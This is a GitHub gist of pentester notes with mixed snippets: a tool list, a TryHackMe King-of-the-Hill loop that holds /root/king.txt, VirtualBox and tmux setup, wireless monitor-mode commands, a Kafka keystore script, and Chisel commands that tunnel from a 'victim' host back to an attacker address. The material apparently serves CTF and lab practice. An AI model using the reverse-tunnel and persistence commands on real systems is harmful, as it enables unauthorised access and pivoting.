Skip to content

Instantly share code, notes, and snippets.

View rhovelz's full-sized avatar
:octocat:
hm?

R rhovelz

:octocat:
hm?
View GitHub Profile
@rhovelz
rhovelz / gist:a61a87810d202502398513ce2b1ef184
Last active January 5, 2023 02:31
some of pentest tools
altdns
amass
awscli
bucket_finder
CloudFlair
commix
dirb
dirsearch
dnsenum
dnsrecon

Trick to stay as king on KOTH from Tryhackme.

Method 1

#!/bin/bash
while :
do
        eval "echo [usernameHere] >> /root/king.txt"
        eval " > /root/king.txt"
done
  • sudo modprobe -a vboxdrv
  • sudo vim /etc/modules-load.d/virtualbox.conf
  • sudo gpasswd -a $USER vboxusers
https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet#links

Autostart tmux when open terminal (Alacritty)

  • alacritty -e bash -c "tmux -q has-session && exec tmux attach-session -d || exec tmux new-session -n$USER -s$USER@$HOSTNAME"

Installation and usage

Git clone this repo: git clone https://github.com/Cr3atable/LinuxED/ in a terminal. cd into the newly cloned repo: cd LinuxED Execute the Python script: python3 LinuxED.py and follow the instructions. Restart Discord entirely. That's it! EnhancedDiscord is now installed.

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
## Chisel norm mode
on attacker: ./chisel_1.7.0-rc7_linux_amd64 server -p 1337 --reverse
on victim: .\chisel.exe client 10.10.14.134:1337 R:1337:127.0.0.1:1337
#Author Corshine
#Github: github.com/rdvcorshine/
#!/bin/bash
PASSWORD=test1234
VALIDITY=365
keytool -keystore kafka.server.keystore.jks -alias localhost -validity $VALIDITY -genkey
openssl req -new -x509 -keyout ca-key -out ca-cert -days $VALIDITY
keytool -keystore kafka.server.truststore.jks -alias CARoot -import -file ca-cert
keytool -keystore kafka.client.truststore.jks -alias CARoot -import -file ca-cert